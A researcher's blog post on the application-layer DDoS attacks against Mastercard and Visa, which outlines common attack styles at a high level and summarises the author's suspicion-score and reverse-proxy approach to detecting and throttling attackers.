Application-layer DDoS claims its latest victims: Wikileaks, Mastercard and Visa. What can the security community do to stop application-layer DDoS attacks and the ensuing nuisance for legitimate users of a web site, once and for all?
In the latest episode in the saga of WikiLeaks inspired cyber war, the websites of Mastercard and Visa were brought down by an application-layer DDoS attack. You can find more details on how the attack was launched here and here.
I didn’t find it surprising how easy it was for someone to bring these sites down with less than 1000 user machines who volunteered to be bots. What I did find surprising was that corporations such as Mastercard and Visa do not have sufficient capacity or safeguards in place to protect themselves from such an attack. Even more surprising is that we have know about application-layer DDoS attacks for almost a decade and still we hear about how such and such corporation was brought down. The first incident of application layer DDoS attack was CyberSlam operation when a TiVo vendor DDoS’ed his competitor’s site. More recently, in 2008, CNN.com was brought down by “hacktivists” allegedly from China – all they had to do was to keep their browser open with an iframe that would constantly referesh cnn.com.
Even more surprising is how corporations, enterprise networks and ISPs still don’t have an automated approach to detect DDoS attacks and prevent them automatically. Every time a DDoS attack occurs, we read about how IT folks from that web site had to quickly change their DNS provider or move to a cloud based service such as Amazon, etc. What we really need is an automated approach to handling DDoS.
I wrote my PhD dissertation half-a-decade ago and two ACM papers (INFOCOM’06, ToN’08) on this topic: on how to automatically detect DDoS attackers and then throttle them at a reverse proxy server that sits before the web server tier.
In a nutshell, my thesis talks about the various possible ways by which someone can launch an application-layer DDoS attack. An attacker can either (1) send a lot of requests too fast, or (2) launch an asymmetric attack by figuring out the heaviest page or largest image file and fetch it many more times than other pages, (3) or a personal favorite and nastiest to detect approach, which I named “guerilla attack”, open a lot of new HTTP/1.1 sessions, send one request per session and disappear without waiting for the response from the server, i.e. keep the session with apache server half-open. Performance tests against a benchmark site showed how much damage such attacks can cause: a site which say normally serves 100 concurrent users at a time while providing them responses within 0.1 seconds can easily see the response times of legitimate users rise to 40 seconds (at which point they will be annoyed and leave the site) with the most potent attack that only involved using 300 clients generating guerilla attacks.
On the detection front, I proposed an approach to assign suspicion scores to each HTTP/1.1 session on the basis of how well behaved it is. So a misbehaving session which is either sending requests faster than normal or generating request distributions that vary from normal user browsing profiles, will be assigned a high suspicion score. Then a reverse proxy server that keeps track of CPU loads and network utilization in the web cluster will schedule sessions inside on the basis of incoming sessions’ suspicion score. So if you have a low suspicion score, your session’s requests will be given higher priority than someone with a high suspicion.
Every time I read about a new application-level DDoS, I am inspired to open source my reverse proxy code. Any of you reading this interested in helping out, just holler.